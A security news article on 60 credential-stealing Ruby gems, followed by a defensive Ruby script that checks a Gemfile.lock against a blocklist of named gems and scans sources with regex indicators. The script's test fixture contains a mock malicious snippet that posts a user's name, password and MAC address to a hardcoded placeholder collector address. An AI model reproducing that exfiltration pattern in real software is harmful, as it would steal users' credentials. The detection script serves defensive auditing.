60 Malicious Ruby Gems Downloaded 275,000 Times Compromise User Credentials
Sixty malicious Ruby gems containing credential-stealing code have been downloaded over 275,000 times since March 2023, primarily targeting developer accounts in South Korea. Discovered by Socket, the gems targeted users of automation tools for platforms such as Instagram, TikTok, Twitter/X, Telegram, Naver, WordPress, and Kakao. RubyGems is the official package manager for the Ruby programming language; it distributes, installs, and manages Ruby libraries, much as npm does for JavaScript and PyPI for Python. The malicious gems were published on RubyGems.org under several aliases, with the offending publishers identified as Zon, Nowon, Kwonsoonje, and Soonje. Spreading the activity across multiple accounts complicates efforts to trace and block it.
The full list of malicious packages is available in Socket’s report, which highlights notable cases of deceptively named or typosquatted packages, including WordPress-style automators such as Wp_Posting_Duo and Wp_Posting_Zon and Telegram-style bots such as Tg_Send_Duo and Tg_Send_Zon. Each of the 60 gems presents a legitimate-looking graphical user interface (GUI), but underneath it functions as a phishing tool that exfiltrates the credentials a user enters to attackers via hardcoded command-and-control addresses. The harvested data includes usernames, plaintext passwords, device MAC addresses for fingerprinting, and the package name, which lets the operators track which lure performed best. Some of the tools even display fake success or failure messages so that victims believe the requested action was carried out.

Socket has found credential logs on Russian-speaking darknet markets linked to these gems, and at least 16 of the malicious gems remain available despite having been reported to the RubyGems team. Supply chain attacks on RubyGems are not new; previous incidents involved typosquatting of legitimate open-source plugins. This underscores the need for developers to scrutinise libraries sourced from open-source repositories for suspicious code and to consider the publisher’s reputation and release history.
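One way to turn the behaviours described above into a local check is an offline audit that reads a project's Gemfile.lock, compares the resolved gem names against the names the article calls out, and statically scans each gem's source for the traits Socket attributes to these packages (a hardcoded collector address, an outbound POST, a credential field in the payload, MAC address collection). The following Ruby script is an added example written for this page; it is not code from Socket's report, from RubyGems, or from the gems themselves. The blocklist holds only the four names quoted above (the full list lives in Socket's report), the indicator regexes are this example's own heuristics, and both the lockfile and the gem source are constructed fixtures rather than real package contents.

```ruby
# Added example: offline audit of a Gemfile.lock plus a static scan of gem
# sources for the behaviours the article describes. Not the project's code.

# Gem names quoted in the article; compared case-insensitively. The complete
# list of 60 is in Socket's report, this is only the subset named above.
KNOWN_MALICIOUS_GEMS = %w[wp_posting_duo wp_posting_zon tg_send_duo tg_send_zon].freeze

# Static indicators (this example's own heuristics). One hit alone is weak
# evidence; several together in one gem are worth a manual review.
INDICATORS = {
  'outbound HTTP POST'          => /Net::HTTP\.(post|post_form|start)\b|HTTParty\.post|RestClient\.post/,
  'hardcoded IP-address URL'    => /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}/,
  'credential field in payload' => /['"](password|passwd|pw)['"]\s*(=>|:)/i,
  'MAC address collection'      => /\b(ifconfig|getmac|ipconfig)\b|\bmac(addr|_address)?\b/i,
}.freeze

# Parse the `specs:` block of a Gemfile.lock into [name, version] pairs.
# Top-level gems are indented exactly four spaces; their transitive
# dependencies sit at six spaces and are skipped because they are also
# listed at the top level with their own resolved version.
def parse_gemfile_lock(text)
  in_specs = false
  text.each_line.with_object([]) do |line, gems|
    if line.strip == 'specs:'
      in_specs = true
    elsif line =~ /\A\S/ # next top-level section (PLATFORMS, DEPENDENCIES, ...)
      in_specs = false
    elsif in_specs && (m = line.match(/\A {4}(\S+) \(([^)]+)\)\s*\z/))
      gems << [m[1], m[2]]
    end
  end
end

# Names in the lockfile that match the article's blocklist.
def blocklisted_gems(lockfile_text)
  parse_gemfile_lock(lockfile_text)
    .select { |name, _| KNOWN_MALICIOUS_GEMS.include?(name.downcase) }
    .map(&:first)
end

# Which behavioural indicators appear in one gem's source text.
def scan_source(source)
  INDICATORS.select { |_, re| source.match?(re) }.keys
end

# Combine both checks. `sources` maps gem name => concatenated source text.
# A gem is reported if it is blocklisted or shows at least two indicators.
def audit(lockfile_text, sources)
  flagged = blocklisted_gems(lockfile_text)
  parse_gemfile_lock(lockfile_text).each_with_object({}) do |(name, version), report|
    hits = scan_source(sources.fetch(name, ''))
    next unless flagged.include?(name) || hits.size >= 2
    report[name] = { version: version, blocklisted: flagged.include?(name), indicators: hits }
  end
end

# Constructed fixtures for a stand-alone run (not real gem contents).
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      nokogiri (1.16.0)
        racc (~> 1.4)
      racc (1.7.3)
      wp_posting_duo (1.0.0)

  PLATFORMS
    ruby

  DEPENDENCIES
    nokogiri
    wp_posting_duo
LOCK

SAMPLE_SOURCES = {
  'nokogiri'       => "require 'nokogiri'\ndoc = Nokogiri::HTML(html)\n",
  'wp_posting_duo' => <<~'SRC',
    require 'tk'
    require 'net/http'
    C2 = 'http://203.0.113.10/collect'   # hardcoded collector (TEST-NET address, constructed)
    mac = `ifconfig`[/([0-9a-f]{2}:){5}[0-9a-f]{2}/i]
    Net::HTTP.post(URI(C2), { 'user' => user, 'password' => pass, 'mac' => mac }.to_json)
    puts 'Posting succeeded!'            # fake success message shown to the victim
  SRC
}.freeze

if __FILE__ == $PROGRAM_NAME
  audit(SAMPLE_LOCK, SAMPLE_SOURCES).each do |name, info|
    puts "#{name} #{info[:version]}: blocklisted=#{info[:blocklisted]} indicators=#{info[:indicators].join(', ')}"
  end
end
```

In a real project you would feed `audit` the text of the project's Gemfile.lock and, for `sources`, the concatenated `.rb` files under each gem's install path (for example from `gem contents <name>`). The name check is exact and cheap; the indicator scan is deliberately noisy, so treat its output as a review queue rather than a verdict, and combine it with the publisher and release-history checks the article recommends.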
Categories: Malicious Ruby Gems, Credential Theft, Phishing Tools
Tags: Malicious Gems, Credential-Stealing, RubyGems, Phishing Tools, Automation Tools, Typosquatting, Supply Chain Attacks, User Credentials, Command-and-Control, Darknet Markets